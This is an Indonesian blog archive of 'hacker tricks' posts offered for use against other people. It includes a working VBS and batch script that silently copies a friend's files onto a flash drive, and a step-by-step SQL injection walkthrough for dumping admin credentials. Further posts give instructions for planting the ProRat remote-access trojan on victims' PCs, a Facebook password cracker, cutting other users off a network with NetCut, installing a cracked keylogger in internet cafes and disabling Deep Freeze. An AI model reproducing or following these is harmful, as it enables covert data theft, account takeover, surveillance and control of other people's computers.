Just another WordPress.com site

Archive for the ‘Trik Hacker’ Category

>Diam Diam Copy File Teman

>

Bagi anda yang mungkin mempunyai teman pelit dan tidak mau meminjamkan laptop atau tidak memperbolehkan anda mengkopy datanya apapun (software, musik, gambar atau video 3gp) anda bisa bisa menggunakan trik ini untuk copy data teman anda ke dalam media lain semisal flash disk , dengan catatan anda mengetahui tempat atau folder apa dan dimana teman anda menyimpan file tersebut.
Nah, dari pada ngomong panjang lebar tidak ada juntrungannya, mari kita coba caranya :

1.Buka notepad, buat file vbs ketik atau copy paste script berikut:
dim wshshell, dos
set wshshell = wscript.createobject(“wscript.shell”)
dos = wshshell.expandenvironmentstrings(“%coms…
wshshell.run (dos & ” /c copy.bat”), vbhide
2.Simpan dengan file name nya, contoh start.vbs, save as typenya pilih all files
3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:
@echo off
mkdir %computername%
xcopy “C:\Documents and Settings\%username%\My Documents\*.jpg” %computername% /s/c/q/r
@cls
@exit
4.Simpan dengan file name nya contoh lanjut.bat, save as typenya pilih all files.
Catatan :
– Nama file bat ini harus sesuai dengan script file vbs baris ke empat (copy.bat)
– Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.
– Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (copy.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (copy.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.
– Contoh tersebut diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy.
Silahkan anda coba dan masukkan komentar jika anda berhasil ataupun tidak berhasil

Iklan

>Hack Website Dengan SQL Injection

>

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client. SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb. Maksudnya terjadi, ketika kita bisa memasukkan berbagai karakter huruf, simbol atau kombinasi keduanya ke dalam “query” dengan cara menambahkannya ke addres bar.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
atau
3. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
“/*” adalah karakter penutup perintah SQL atau kita juga bisa pake “–“.
Kalo “+” sebagai penghubung perintah…
5. Nah sampe sini langsung dah nyobain satu2…
Sampai muncul error…
Misalkan errornya disini…
Berarti yang kita ambil adalah “9”
6. Untuk mengetahui berapa angka yang ditampilkan, sekarang kita pake UNION
Contoh :
Perhatikan angka berapa yang keluar
7. Misalnya angka yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
Atau
8. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
dan
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik, terus…Terserah Anda…

>Mengendalikan Komputer Orang Dengan Software Prorat

>

Prorat adalah sebuah tool hacking yang luar biasa. Dan hampir 100 % saat ini berhasil bekerja. Tool ini buatan orang Turki, berfungsi untuk menyusup ke komputer orang lain, melihat isinya bahkan memegang kendalinya. Cara penggunaanya terbilang paling mudah. Yakni :

1. Mengetahui IP dan Port target
2. Menginfeksi Komputer target dengan server buatan kita (dari Prorat)
3. Komputer korban pun bisa kita ambil alih.
Jika anda berkeinginan untuk mengendalikan sebuah komputer dari sebuah warnet maka Software yang anda butuhkan adalah :
1. Software Uninstall Deep Freeze
Hal ini dimaksudkan untuk mengamankan server buatan dari ancaman Deep Freeze (Tentang Deep Freeze bisa di baca dan di download disini)
2. Tool Advanced Port Scanner
Untuk Mengetahui IP dan port komputer target yang terbuka (bisa dibaca dan didownload disini)
3. Software Pro Rat
Software inilah yang akan kita gunakan untuk melihat-lihat dan mengendalikan komputer korban. Sebelum menggunakannya, matikan anti virus di komputer kita terlebih dahulu karena Pro Rat akan terdeteksi sebagai Virus, padahal ia tidak berbahaya untuk komputer kita
Cara Penggunaan Prorat :
1. Buatlah sebuah server yang akan kita gunakan sebagai mata-mata di komputer korban.
2. Susupkan server tersebut di komputer sang korban dengan diam-diam, ataupun secara langsung (lewat flashdisk dsb)
3. Setelah server tersebut berhasil berjalan pada komputer korban, maka segera kita koneksikan dengan Pro rat pada komputer kita.
4. Buka Software Pro Rat setelah sebelumnya kita matikan antivirusnya.
5. Isikan IP korban pada Form IP dan Portnya sekalian (port defaultnya 5110)
6. Klik Tombol Connect
7. Setelah berhasil melakukan koneksi ke komputer lorban, maka status dari Pro Rat akan berubah dari Disconnected ke Connected
8. Inilah saatnya anda melakukan aksi. Ada banyak hal yang dapat anda lakukan, seperti mengetahui informasi PC korban, mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD Room, Bahkan memotret wajah korban.
Itu baru sebagian kecil dari kegunaan Pro Rat, sebenarnya masih banyak lagi fungsi lainnya, seperti memformat hardisk, mengacaukan registry, mencuri data penting dsb. Tetapi dalam pembahasan ini kita cukupkan disini, selebihnya silahkan anda bereksperimen yang baik.
Tidaklah bijaksana apabila kita memberikan ilmu ini tanpa memberikan juga pencegahannya. Untuk pencegahan dari bahaya Prorat bisa anda cari pada tulisan lain di blog ini. Dan silahkan Download Software Pro rat (password rar=”pro”) dan buku petunjuknya bawah :
Download File

>Facebook Account Hacker V 2.4

>

Hacking merupakan istilah mencuri atau merusak. Cara hack layaknya sebuah virus hanya beberapa bulan atau beberpa minggu dapat berkerja, selebihnya tools hack tersebut dapat terdekteksi, artinya pasti admin jaringan social seperti facebook, yahoo dll, ini telah di lengkapi dengan keamananan yang selalu di perbaharui, jadi setiap dia merasa ada spam atau pencuri data pasti dia akan mencari tahu di mana kelemahan jaringan facebook, yahoo, dll tersebut.

Seperti Facebook Account Hacker V 2.4 pada tahun lalu atau bulan febuary yang lalu sofware ini dapat digunakan untuk mencuri paswoord id secara oline di facebook dengan cara mengetik id korban terus mencoba menebak berapa jumlah paswoord si target. 100% berhasil tapi ini berhasil dengan baik pada bulan febuary 2009. Kalau sekarang?? Jangan harap deh. hehehe
Oiya, sobat blogger jangan mencoba menggunakan sofware Facebook acoount hacker V2.4 ini lagi, karena menurut iformasi yang saya dapatkan, bisa-bisa akun facebook anda di banned oleh facebook, karena pihak facebook akan merekam IP anda.
Sofware yang di jual bahkan yang ada di dalam internet sekarang kurang begitu update atau bahkan merusak dan menipu, seperti :
1. Terkadang telah di sisipkan virus berupa virus trojan ex dll ketika di download.
2. Dapat di download tetapi telah di password, kemudian kita di suruh membeli tetapi ketika kita mendapatkan passwordnya dengan cara membeli, isinya bukan hack tapi film doraemon.hahaha (banyak terjadi peniupuan seperti itu). Jadi hati-hati aja dalam membeli sesuatu di internet.
3. Iming-iming dengan membayar berupa uang anda dapat mendapatkan password facebook email dan lain-lain.
4. Bisa digunakan no virus tapi sayang di sayang sofware tersebut sudah jadul. Sudah di block oleh facebook.
Untuk sampai saat ini belom ada sofware yang bekerja dengan baik untuk mencuri password di facebook secara online. Paling yang dapat digunakan untuk mengerjai orang di facebook hanya facebook freezer v1.0, seperti yang sudah saya bahas pada waktu yang lalu. Itu pun, untuk saat ini tool tersebut sudah tidak berjalan lagi, karena pihak facebook telah memperbaikinya.
Sekedar info saja, ada salah satu perusahaan yang bergerak di bidang IT di Amerika membuka jasa monitoring atau dengan kata lain mendapatkan paswoord acount email, facebook dll. tetapi hanya bisa di lakukan dengan cara mengisi formulir pemesanan nya dan datang lansung ke perusahaan tersebut. (artinya hanya anggota keluarga anda sendiri yang dapat di hack, contohnya suami kepada istrinya, ortu kepada anaknya yang masih di bawah 18 tahun). Jadi Hack tersbut 100% legal. (biaya 100$)
Buat sobat blogger yang penasaran dengan tool Facebook Account Hacker V 2.4 nya, silahkan di download aja, tapi saya tidak bertanggung jawab yah, bila terjadi hal-hal yang tidak diinginkan. Okeiii
Artikel ini saya ambil dari http://id-id.facebook.com, dengan perubahan kata seperlunya, dengan maksud agar mudah di pahami.

Download1

>Mengecek Dan Mencuri Bandwith Wifi/ Lan/ IP Dengan Software Net Cut (Hack)

>

Lagi asik-asik nongkrong di forum secara nggak sengaja saya menemukan sebuah tools yang menurut saya patut untuk saya share di blog saya, katanya sih dengan tools ini sobat blogger bisa mencuri bandwidth orang lain, dan orang yang di curi bandwidth nya secara otomatis akan terputus dari jaringan. Keren kan?? Bandwidth nya kita curi, otomatis kecepatan koneksi kita akan bertambah, bayangkan aja kalau semua pengguna hotspot kita cut??

Pasti sobat blogger udah menyiapkan rencana yang cukup kejam ni, Jangan digunakan untuk iseng yah. Bagaiamana?? mau janji dulu nggak?? kalau nggak mau nggak akan saya lanjutkan lho. Hehehe
Tools ini bernama NetCut yang berarti Network Cut. Network berarti jaringan sedangkan Cut adalah gunting, jadi secara bahsa tools ini dapat diartikan sebagai tools pemotong jaringan. Cara menggunakan tools ini menurut saya relatif mudah, berikut penjelasan nya :
1. Download NetCut di link download yang sudah saya sediakan. (dibawah)
2. Instal NetCut, kemudian ikuti tahapan-tahapan yang ada.
3. Bila proses instal telah selesai, silakan restart pc anda
4. Kemudian jalankan Program NetCut, maka akan tampak IP yang sedang aktif.
5. Plih IP yang akan anda jadikan mangsa, senjutnya klik Cut Off
Jrengggg,, IP target akan terputus dari server dan jatah bandwidth nya jadi milik anda. Gampang kan cara menggunakan nya?? sekali lagi saya tekankan, jangan digunakan untuk iseng atau kegiatan yang dapat merugikan orang lain. Misalnya, anda lagi mendownload software sebesar 200 Mb dan proses sudah berjalan 95%, tetapi tiba-tiba koneksi terputus?? bagaimana perasaan anda??
Disini, saya hanya share aja tentang ilmu yang saya dapat, tidak ada maksud untuk mengajari hal-hal yang buruk. Selebihnya tergantung dari setiap individu masing-masing. Mau digunakan untuk kebaikan apa kejahatan. Saya tidak bertanggung jawab dengan segala hal yang akan terjadi setelah anda mencoba trik Cara Mencuri Bandwidth Wifi/Lan Menggunakan NetCut ini.
Untuk mengantisipasi pencurian bandwidth dengan NetCut, sobat blogger butuh tools yang bernama Anti NetCut. Untuk tutorial anti NetCut nya, ditunggu aja yah,, Okei
Selamat Mencoba

Download1

>Keylogger Dan Fungsinya

>

Sebelum saya membahas tentang Cara Menggunakan Keylogger, ada baiknya saya menjelaskan terlebih dahulu apa itu keylogger, dan bagaimana fungsinya. Mungkin sobat-sobat blogger ada yang belum tahu, dan bagi yang sudah tahu tentang keylogger ini, mohon koreksinya bila menemukan kesalahan di tutorial saya ini.

Keylogger adalah sebuah software atau piranti lunak yang berfungsi untuk mencatat segala aktivitas yang kita lakukan di computer. Mulai dari kita menekan a-z, 0-9, kombinasi keyboard seperti ctrl+C dan lain-lain akan tercatat oleh keylogger.
Cara kerja keyloger bersifat hidden (tersembunyi). Biasanya dia akan muncul di systray jika kita melakukan kombinasi keyboard (shortcut tertentu). Keren sekaligus menakutkan. Seandainya keylogger di instal di warnet?? facebook orang pun dengan mudah bisa kita ambil alih.
Pesan saya, sebaiknya keylogger ini dipergunakan dengan bijak, karena perbuatan yang kita tanam hari ini kita akan memetik hasilnya di masa yang akan datang. Dan yang penting, segala perbuatan yang anda lakukan, saya tidak bertangggung jawab atas semua yang terjadi. Disini saya hanya berbagi pengetahuan aja ke sobat-sobat blogger.
Sebelumnya, silakan anda download keylogger di link yang saya sediakan dibawah. Bila sudah, segera ekstrak dan lakukan instalasi. Ikuti step-step yang ada hingga proses instalasi pun selesai. Bila sudah, tutup keylogger. Karena kita akan meng-crack keylogger agar menjadi fullversi. Perhatikan :
Copy-paste ctfmon.exe dan Serial.key dari folder crack ke foleder tempat anda menginstal keylogger. Secara default keylogger terinstal di C:\WINDOWS\system32\CTF.
Kemudian jalankan program.Keylogger anda kini sudah menjadi fullversion.
Sekarang coba anda menuliskan sesuatu, bila sudah, coba buka keylogger nya dengan cara menclick 2x atau klik kanan lalu pilih yang view log. Maka akan tampil seperti ini,
NB: Sebelum anda menginstal keylogger, sebaiknya matikan/disable terlebih dahulu antivirus anda, karena keylogger adalah program terlarang jadi wajar saja antivirus harus di disable.

Keylogger FamilyDownload1
Download CRACKDownload1

>Cara Mematikan Deep Freeze Dengan Anti Deep Freeze

>

Software ini biasa digunakan untuk mengeluarkan Deep Freeze yang lupa passwordnya, dan bukan untuk menjebol.

Cara Menggunakan Anti Deep Freeze v0.1 :
1. Pertama download dulu softwarenya di bawah
1. Buka dan jalankan file ADF-nya.
2. Lalu pilih versi deep freeze yang sedang digunakan.
3. Buka Deep Freeze anda, dengan cara tekan shift kemudian Klick 2x icon deep freeze di sytem tray (kanan bawah),
4. Pilih : Boot Thawed
5. Selesai

Note: Program Anti Deep Freeze v0.1 ini tidak bekerja Untuk versi Deep Freeze Enterprise. Anti Deep Freeze v0.1 hanya berjalan untuk Deep Freeze versi 4,5,6
Sebelumnya download dulu software Anti Deep Freeze nya Disini :

Download1

Awan Tag